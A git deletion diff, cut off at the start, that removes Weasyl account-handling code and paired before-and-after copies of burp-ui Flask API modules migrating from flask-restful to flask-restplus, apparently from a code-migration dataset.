sess.additional_data.changed() - else: - sess.userid = None - sess.save = True - - -def authenticate_bcrypt(username, password, session=True): - """ - Return a result tuple of the form (userid, error); `error` is None if the - login was successful. Pass `session` as False to authenticate a user without - creating a new session. - - Possible errors are: - - "invalid" - - "unexpected" - - "address" - - "banned" - - "suspended" - """ - # Check that the user entered potentially valid values for `username` and - # `password` before attempting to authenticate them - if not username or not password: - return 0, "invalid" - - # Select the authentication data necessary to check that the the user-entered - # credentials are valid - query = d.execute("SELECT ab.userid, ab.hashsum, lo.settings FROM authbcrypt ab" - " RIGHT JOIN login lo USING (userid)" - " WHERE lo.login_name = '%s'", [d.get_sysname(username)], ["single"]) - - if not query: - return 0, "invalid" - - USERID, HASHSUM, SETTINGS = query - HASHSUM = HASHSUM.encode('utf-8') - - d.metric('increment', 'attemptedlogins') - - unicode_success = bcrypt.checkpw(password.encode('utf-8'), HASHSUM) - if not unicode_success and not bcrypt.checkpw(d.plaintext(password).encode('utf-8'), HASHSUM): - # Log the failed login attempt in a security log if the account the user - # attempted to log into is a privileged account - if USERID in staff.MODS: - d.append_to_log('login.fail', userid=USERID, ip=d.get_address()) - d.metric('increment', 'failedlogins') - - # Return a zero userid and an error code (indicating the entered password - # was incorrect) - return 0, "invalid" - elif "b" in SETTINGS: - # Return the proper userid and an error code (indicating the user's account - # has been banned) - return USERID, "banned" - elif "s" in SETTINGS: - suspension = moderation.get_suspension(USERID) - - if d.get_time() > suspension.release: - d.execute("UPDATE login SET settings = REPLACE(settings, 's', '') WHERE userid = %i", [USERID]) - d.execute("DELETE FROM suspension WHERE userid = %i", [USERID]) - d.get_login_settings.invalidate(USERID) - else: - # Return the proper userid and an error code (indicating the user's - # account has been temporarily suspended) - return USERID, "suspended" - - # Attempt to create a new session if `session` is True, then log the signin - # if it succeeded. - if session: - signin(USERID) - d.append_to_log('login.success', userid=USERID, ip=d.get_address()) - d.metric('increment', 'logins') - - status = None - if not unicode_success: - # Oops; the user's password was stored badly, but they did successfully authenticate. - status = 'unicode-failure' - # Either way, authentication succeeded, so return the userid and a status. - return USERID, status - - -def passhash(password): - return bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt(m.MACRO_BCRYPT_ROUNDS)) - - -def password_secure(password): - """ - Return True if the password meets requirements, else False. - """ - return len(password) >= _PASSWORD - - -# form -# username email month -# password emailcheck year -# passcheck day - -def create(form): - # Normalize form data - username = d.plaintext(form.username[:_USERNAME]) - sysname = d.get_sysname(username) - - email = emailer.normalize_address(form.email) - emailcheck = emailer.normalize_address(form.emailcheck) - - password = form.password - passcheck = form.passcheck - - if form.day and form.month and form.year: - try: - birthday = arrow.Arrow(int(form.year), int(form.month), int(form.day)) - except ValueError: - raise WeasylError("birthdayInvalid") - else: - birthday = None - - # Check mismatched form data - if password != passcheck: - raise WeasylError("passwordMismatch") - if email != emailcheck: - raise WeasylError("emailMismatch") - - # Check invalid form data - if birthday is None or d.age_in_years(birthday) < 13: - raise WeasylError("birthdayInvalid") - if not password_secure(password): - raise WeasylError("passwordInsecure") - if not email: - raise WeasylError("emailInvalid") - if not sysname or ";" in username: - raise WeasylError("usernameInvalid") - if sysname in ["admin", "administrator", "mod", "moderator", "weasyl", - "weasyladmin", "weasylmod", "staff", "security"]: - raise WeasylError("usernameInvalid") - if email_exists(email): - raise WeasylError("emailExists") - if username_exists(sysname): - raise WeasylError("usernameExists") - - # Create pending account - token = security.generate_key(40) - - d.engine.execute(d.meta.tables["logincreate"].insert(), { - "token": token, - "username": username, - "login_name": sysname, - "hashpass": passhash(password), - "email": email, - "birthday": birthday, - "unixtime": arrow.now(), - }) - - # Queue verification email - emailer.append([email], None, "Weasyl Account Creation", d.render( - "email/verify_account.html", [token, sysname])) - d.metric('increment', 'createdusers') - - -def verify(token): - lo = d.meta.tables["login"] - lc = d.meta.tables["logincreate"] - query = d.engine.execute(lc.select().where(lc.c.token == token)).first() - - if not query: - raise WeasylError("logincreateRecordMissing") - - db = d.connect() - with db.begin(): - # Create login record - userid = db.execute(lo.insert().returning(lo.c.userid), { - "login_name": d.get_sysname(query.username), - "last_login": arrow.now(), - "email": query.email, - }).scalar() - - # Create profile records - db.execute(d.meta.tables["authbcrypt"].insert(), { - "userid": userid, - "hashsum": query.hashpass, - }) - db.execute(d.meta.tables["profile"].insert(), { - "userid": userid, - "username": query.username, - "full_name": query.username, - "unixtime": arrow.now(), - "config": "kscftj", - }) - db.execute(d.meta.tables["userinfo"].insert(), { - "userid": userid, - "birthday": query.birthday, - }) - db.execute(d.meta.tables["userstats"].insert(), { - "userid": userid, - }) - db.execute(d.meta.tables["welcomecount"].insert(), { - "userid": userid, - }) - - # Update logincreate records - db.execute(lc.delete().where(lc.c.token == token)) - - d.metric('increment', 'verifiedusers') - - -def email_exists(email): - return d.engine.execute(""" - SELECT - EXISTS (SELECT 0 FROM login WHERE email = %(email)s) OR - EXISTS (SELECT 0 FROM logincreate WHERE email = %(email)s) - """, email=email).scalar() - - -def username_exists(login_name): - return d.engine.execute(""" - SELECT - EXISTS (SELECT 0 FROM login WHERE login_name = %(name)s) OR - EXISTS (SELECT 0 FROM useralias WHERE alias_name = %(name)s) OR - EXISTS (SELECT 0 FROM logincreate WHERE login_name = %(name)s) - """, name=login_name).scalar() - - -def settings(userid, setting=None): - if setting: - return d.execute("SELECT settings ~ '%s' FROM login WHERE userid = %i", - [setting, userid], options="bool") - else: - return d.execute("SELECT settings FROM login WHERE userid = %i", - [userid], options="element") - - -def sessionid(userid): - return d.execute("SELECT sessionid FROM usersession WHERE userid = %i", - [userid], options="element") - - -def update_unicode_password(userid, password, password_confirm): - if password != password_confirm: - raise WeasylError('passwordMismatch') - if not password_secure(password): - raise WeasylError('passwordInsecure') - - hashpw = d.engine.scalar(""" - SELECT hashsum FROM authbcrypt WHERE userid = %(userid)s - """, userid=userid).encode('utf-8') - - if bcrypt.checkpw(password.encode('utf-8'), hashpw): - return - - if not bcrypt.checkpw(d.plaintext(password).encode('utf-8'), hashpw): - raise WeasylError('passwordIncorrect') - - d.engine.execute(""" - UPDATE authbcrypt SET hashsum = %(hashsum)s WHERE userid = %(userid)s - """, userid=userid, hashsum=passhash(password)) - - -def get_account_verification_token(email=None, username=None): - email = email and emailer.normalize_address(email) - username = username and d.get_sysname(username) - - logincreate = d.meta.tables['logincreate'] - statement = select([logincreate.c.token]) - - if email: - statement = statement.where(logincreate.c.email.ilike(email)) - else: - statement = statement.where(logincreate.c.login_name == username) - - return d.engine.execute(statement).scalar() diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.diff b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.diff deleted file mode 100644 index 0b55fd3..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/burpui/api/__init__.py b/burpui/api/__init__.py - index 66f580a4db8b186e9e8658c6ed487fa89cc4a4ec..8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 100644 - --- a/burpui/api/__init__.py - +++ b/burpui/api/__init__.py -@@ -11,7 +11,7 @@ - import os - import sys - --from flask.ext.restful import Api -+from flask.ext.restplus import Api - from importlib import import_module - - diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.source.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.source.py deleted file mode 100644 index f4a37e6..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.source.py +++ /dev/null @@ -1,43 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api - :platform: Unix - :synopsis: Burp-UI api module. - -.. moduleauthor:: Ziirish - - -""" -import os -import sys - -from flask.ext.restful import Api -from importlib import import_module - - -class ApiWrapper(Api): - loaded = False - - def init_bui(self, bui): - """Loads the right context. - :param bui: application context - :type bui: :class:`burpui.server.BUIServer` - """ - self.bui = bui - - def load_all(self): - # hack to automatically import api modules - if not self.loaded: - sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) - self.loaded = True - for f in os.listdir(__path__[0]): - name, ext = os.path.splitext(f) - if (os.path.isfile(os.path.join(__path__[0], f)) and - ext == '.py' and - name not in ['__init__', '.', '..']): - mod = '.' + name - import_module(mod, 'burpui.api') - - -api = ApiWrapper() -api.load_all() diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.target.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.target.py deleted file mode 100644 index 72d5bce..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$__init__.py.target.py +++ /dev/null @@ -1,43 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api - :platform: Unix - :synopsis: Burp-UI api module. - -.. moduleauthor:: Ziirish - - -""" -import os -import sys - -from flask.ext.restplus import Api -from importlib import import_module - - -class ApiWrapper(Api): - loaded = False - - def init_bui(self, bui): - """Loads the right context. - :param bui: application context - :type bui: :class:`burpui.server.BUIServer` - """ - self.bui = bui - - def load_all(self): - # hack to automatically import api modules - if not self.loaded: - sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) - self.loaded = True - for f in os.listdir(__path__[0]): - name, ext = os.path.splitext(f) - if (os.path.isfile(os.path.join(__path__[0], f)) and - ext == '.py' and - name not in ['__init__', '.', '..']): - mod = '.' + name - import_module(mod, 'burpui.api') - - -api = ApiWrapper() -api.load_all() diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.diff b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.diff deleted file mode 100644 index ead3a5c..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/burpui/api/client.py b/burpui/api/client.py - index 66f580a4db8b186e9e8658c6ed487fa89cc4a4ec..8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 100644 - --- a/burpui/api/client.py - +++ b/burpui/api/client.py -@@ -10,7 +10,7 @@ - # This is a submodule we can also use "from ..api import api" - from . import api - from ..misc.utils import BUIserverException --from flask.ext.restful import reqparse, Resource -+from flask.ext.restplus import reqparse, Resource - from flask.ext.login import current_user, login_required - from flask import jsonify - diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.source.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.source.py deleted file mode 100644 index 1796cbc..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.source.py +++ /dev/null @@ -1,358 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.client - :platform: Unix - :synopsis: Burp-UI client api module. - -.. moduleauthor:: Ziirish - -""" -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException -from flask.ext.restful import reqparse, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify - - -@api.resource('/api/client-tree.json//', - '/api//client-tree.json//', - endpoint='api.client_tree') -class ClientTree(Resource): - """The :class:`burpui.api.client.ClientTree` resource allows you to - retrieve a list of files in a given backup. - - This resource is part of the :mod:`burpui.api.client` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - A mandatory ``GET`` parameter called ``root`` is used to know what path we - are working on. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - self.parser.add_argument('root', type=str) - - @login_required - def get(self, server=None, name=None, backup=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "date": "2015-05-21 14:54:49", - "gid": "0", - "inodes": "173", - "mode": "drwxr-xr-x", - "name": "/", - "parent": "", - "size": "12.0KiB", - "type": "d", - "uid": "0" - } - ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: The *JSON* described above. - """ - if not server: - server = self.parser.parse_args()['server'] - j = [] - if not name or not backup: # pargma: no cover - return jsonify(results=j) - root = self.parser.parse_args()['root'] - try: - if (api.bui.acl and - (not api.bui.acl.is_admin(current_user.get_id()) and not - api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server))): - raise BUIserverException('Sorry, you are not allowed to view this client') - j = api.bui.cli.get_tree(name, backup, root, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=j) # pargma: no cover - - -@api.resource('/api/client-stats.json/', - '/api//client-stats.json/', - '/api/client-stats.json//', - '/api//client-stats.json//', - endpoint='api.client_stats') -class ClientStats(Resource): - """The :class:`burpui.api.client.ClientStats` resource allows you to - retrieve a statistics on a given backup for a given client. - - This resource is part of the :mod:`burpui.api.client` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None, name=None, backup=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": { - "dir": { - "changed": 0, - "deleted": 0, - "new": 394, - "scanned": 394, - "total": 394, - "unchanged": 0 - }, - "duration": 5, - "efs": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "encrypted": true, - "end": 1422189124, - "files": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "files_enc": { - "changed": 0, - "deleted": 0, - "new": 1421, - "scanned": 1421, - "total": 1421, - "unchanged": 0 - }, - "hardlink": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "meta": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "meta_enc": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "number": 1, - "received": 1679304, - "softlink": { - "changed": 0, - "deleted": 0, - "new": 1302, - "scanned": 1302, - "total": 1302, - "unchanged": 0 - }, - "special": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "start": 1422189119, - "total": { - "changed": 0, - "deleted": 0, - "new": 3117, - "scanned": 3117, - "total": 3117, - "unchanged": 0 - }, - "totsize": 5345361, - "vssfooter": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "vssfooter_enc": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "vssheader": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "vssheader_enc": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "windows": "false" - } - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: The *JSON* described above. - """ - if not server: - server = self.parser.parse_args()['server'] - j = [] - if not name: - err = [[1, 'No client defined']] - return jsonify(notif=err) - if (api.bui.acl and not - api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server)): - err = [[2, 'You don\'t have rights to view this client stats']] - return jsonify(notif=err) - if backup: - try: - j = api.bui.cli.get_backup_logs(backup, name, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - else: - try: - cl = api.bui.cli.get_client(name, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - err = [] - for c in cl: - try: - j.append(api.bui.cli.get_backup_logs(c['number'], name, agent=server)) - except BUIserverException as e: - temp = [2, str(e)] - if temp not in err: - err.append(temp) - if err: - return jsonify(notif=err) - return jsonify(results=j) - - -@api.resource('/api/client.json/', - '/api//client.json/', - endpoint='api.client_report') -class ClientReport(Resource): - """The :class:`burpui.api.client.ClientReport` resource allows you to - retrieve a list of backups for a given client. - - This resource is part of the :mod:`burpui.api.client` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None, name=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "date": "2015-01-25 13:32:00", - "deletable": true, - "encrypted": true, - "number": "1" - } - ] - } - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :returns: The *JSON* described above. - """ - if not server: - server = self.parser.parse_args()['server'] - try: - if (api.bui.acl and ( - not api.bui.acl.is_admin(current_user.get_id()) and - not api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server))): - raise BUIserverException('Sorry, you cannot access this client') - j = api.bui.cli.get_client(name, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=j) diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.target.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.target.py deleted file mode 100644 index ad1862c..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$client.py.target.py +++ /dev/null @@ -1,358 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.client - :platform: Unix - :synopsis: Burp-UI client api module. - -.. moduleauthor:: Ziirish - -""" -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException -from flask.ext.restplus import reqparse, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify - - -@api.resource('/api/client-tree.json//', - '/api//client-tree.json//', - endpoint='api.client_tree') -class ClientTree(Resource): - """The :class:`burpui.api.client.ClientTree` resource allows you to - retrieve a list of files in a given backup. - - This resource is part of the :mod:`burpui.api.client` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - A mandatory ``GET`` parameter called ``root`` is used to know what path we - are working on. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - self.parser.add_argument('root', type=str) - - @login_required - def get(self, server=None, name=None, backup=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "date": "2015-05-21 14:54:49", - "gid": "0", - "inodes": "173", - "mode": "drwxr-xr-x", - "name": "/", - "parent": "", - "size": "12.0KiB", - "type": "d", - "uid": "0" - } - ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: The *JSON* described above. - """ - if not server: - server = self.parser.parse_args()['server'] - j = [] - if not name or not backup: # pargma: no cover - return jsonify(results=j) - root = self.parser.parse_args()['root'] - try: - if (api.bui.acl and - (not api.bui.acl.is_admin(current_user.get_id()) and not - api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server))): - raise BUIserverException('Sorry, you are not allowed to view this client') - j = api.bui.cli.get_tree(name, backup, root, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=j) # pargma: no cover - - -@api.resource('/api/client-stats.json/', - '/api//client-stats.json/', - '/api/client-stats.json//', - '/api//client-stats.json//', - endpoint='api.client_stats') -class ClientStats(Resource): - """The :class:`burpui.api.client.ClientStats` resource allows you to - retrieve a statistics on a given backup for a given client. - - This resource is part of the :mod:`burpui.api.client` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None, name=None, backup=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": { - "dir": { - "changed": 0, - "deleted": 0, - "new": 394, - "scanned": 394, - "total": 394, - "unchanged": 0 - }, - "duration": 5, - "efs": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "encrypted": true, - "end": 1422189124, - "files": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "files_enc": { - "changed": 0, - "deleted": 0, - "new": 1421, - "scanned": 1421, - "total": 1421, - "unchanged": 0 - }, - "hardlink": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "meta": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "meta_enc": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "number": 1, - "received": 1679304, - "softlink": { - "changed": 0, - "deleted": 0, - "new": 1302, - "scanned": 1302, - "total": 1302, - "unchanged": 0 - }, - "special": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "start": 1422189119, - "total": { - "changed": 0, - "deleted": 0, - "new": 3117, - "scanned": 3117, - "total": 3117, - "unchanged": 0 - }, - "totsize": 5345361, - "vssfooter": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "vssfooter_enc": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "vssheader": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "vssheader_enc": { - "changed": 0, - "deleted": 0, - "new": 0, - "scanned": 0, - "total": 0, - "unchanged": 0 - }, - "windows": "false" - } - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: The *JSON* described above. - """ - if not server: - server = self.parser.parse_args()['server'] - j = [] - if not name: - err = [[1, 'No client defined']] - return jsonify(notif=err) - if (api.bui.acl and not - api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server)): - err = [[2, 'You don\'t have rights to view this client stats']] - return jsonify(notif=err) - if backup: - try: - j = api.bui.cli.get_backup_logs(backup, name, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - else: - try: - cl = api.bui.cli.get_client(name, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - err = [] - for c in cl: - try: - j.append(api.bui.cli.get_backup_logs(c['number'], name, agent=server)) - except BUIserverException as e: - temp = [2, str(e)] - if temp not in err: - err.append(temp) - if err: - return jsonify(notif=err) - return jsonify(results=j) - - -@api.resource('/api/client.json/', - '/api//client.json/', - endpoint='api.client_report') -class ClientReport(Resource): - """The :class:`burpui.api.client.ClientReport` resource allows you to - retrieve a list of backups for a given client. - - This resource is part of the :mod:`burpui.api.client` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None, name=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "date": "2015-01-25 13:32:00", - "deletable": true, - "encrypted": true, - "number": "1" - } - ] - } - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :returns: The *JSON* described above. - """ - if not server: - server = self.parser.parse_args()['server'] - try: - if (api.bui.acl and ( - not api.bui.acl.is_admin(current_user.get_id()) and - not api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server))): - raise BUIserverException('Sorry, you cannot access this client') - j = api.bui.cli.get_client(name, agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=j) diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.diff b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.diff deleted file mode 100644 index b618d0b..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/burpui/api/clients.py b/burpui/api/clients.py - index 66f580a4db8b186e9e8658c6ed487fa89cc4a4ec..8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 100644 - --- a/burpui/api/clients.py - +++ b/burpui/api/clients.py -@@ -12,7 +12,7 @@ from . import api - from ..misc.utils import BUIserverException - - from future.utils import iteritems --from flask.ext.restful import reqparse, Resource -+from flask.ext.restplus import reqparse, Resource - from flask.ext.login import current_user, login_required - from flask import jsonify - diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.source.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.source.py deleted file mode 100644 index cb66918..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.source.py +++ /dev/null @@ -1,314 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.clients - :platform: Unix - :synopsis: Burp-UI clients api module. - -.. moduleauthor:: Ziirish - -""" -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException - -from future.utils import iteritems -from flask.ext.restful import reqparse, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify - - -@api.resource('/api/running-clients.json', - '/api//running-clients.json', - '/api/running-clients.json/', - '/api//running-clients.json/', - endpoint='api.running_clients') -class RunningClients(Resource): - """The :class:`burpui.api.clients.RunningClients` resource allows you to - retrieve a list of clients that are currently running a backup. - - This resource is part of the :mod:`burpui.api.clients` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, client=None, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param client: Ask a specific client in order to know if it is running a backup - :type client: str - - :returns: The *JSON* described above. - """ - if not server: - server = self.parser.parse_args()['server'] - if client: - if api.bui.acl: - if (not api.bui.acl.is_admin(current_user.get_id()) and not - api.bui.acl.is_client_allowed(current_user.get_id(), - client, - server)): - r = [] - return jsonify(results=r) - if api.bui.cli.is_backup_running(client, server): - r = [client] - return jsonify(results=r) - else: - r = [] - return jsonify(results=r) - - r = api.bui.cli.is_one_backup_running(server) - # Manage ACL - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - if isinstance(r, dict): - new = {} - for serv in api.bui.acl.servers(current_user.get_id()): - allowed = api.bui.acl.clients(current_user.get_id(), serv) - new[serv] = [x for x in r[serv] if x in allowed] - r = new - else: - allowed = api.bui.acl.clients(current_user.get_id(), server) - r = [x for x in r if x in allowed] - return jsonify(results=r) - - -@api.resource('/api/running.json', - '/api//running.json', - endpoint='api.running_backup') -class RunningBackup(Resource): - """The :class:`burpui.api.clients.RunningBackup` resource allows you to - access the status of the server in order to know if there is a running - backup currently. - - This resource is part of the :mod:`burpui.api.clients` module. - """ - - @login_required - def get(self, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": false - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above. - """ - j = api.bui.cli.is_one_backup_running(server) - # Manage ACL - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - if isinstance(j, dict): - new = {} - for serv in api.bui.acl.servers(current_user.get_id()): - allowed = api.bui.acl.clients(current_user.get_id(), serv) - new[serv] = [x for x in j[serv] if x in allowed] - j = new - else: - allowed = api.bui.acl.clients(current_user.get_id(), server) - j = [x for x in j if x in allowed] - r = False - if isinstance(j, dict): - for (k, v) in iteritems(j): - if r: - break - r = r or (len(v) > 0) - else: - r = len(j) > 0 - return jsonify(results=r) - - -@api.resource('/api/clients-report.json', - '/api//clients-report.json', - endpoint='api.clients_report') -class ClientsReport(Resource): - """The :class:`burpui.api.clients.ClientsReport` resource allows you to - access general reports about your clients. - - This resource is part of the :mod:`burpui.api.clients` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "backups": [ - { - "name": "client1", - "number": 15 - }, - { - "name": "client2", - "number": 1 - } - ], - "clients": [ - { - "name": "client1", - "stats": { - "total": 296377, - "totsize": 57055793698, - "windows": "false" - } - }, - { - "name": "client2", - "stats": { - "total": 3117, - "totsize": 5345361, - "windows": "true" - } - } - ] - } - ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above - """ - - if not server: - server = self.parser.parse_args()['server'] - j = [] - try: - # Manage ACL - if (not api.bui.standalone and api.bui.acl and - (not api.bui.acl.is_admin(current_user.get_id()) and - server not 